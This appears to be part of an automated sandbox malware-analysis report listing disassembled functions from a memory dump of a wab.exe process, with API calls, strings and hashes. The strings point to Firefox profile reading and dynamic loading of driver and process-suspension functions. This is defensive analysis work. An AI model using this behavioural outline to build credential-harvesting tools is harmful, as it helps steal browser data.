                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                                                                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 829165378-0
                                                                                                                                                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                                                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                                                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                                                                                          • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1043902810-0
                                                                                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                                                                                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
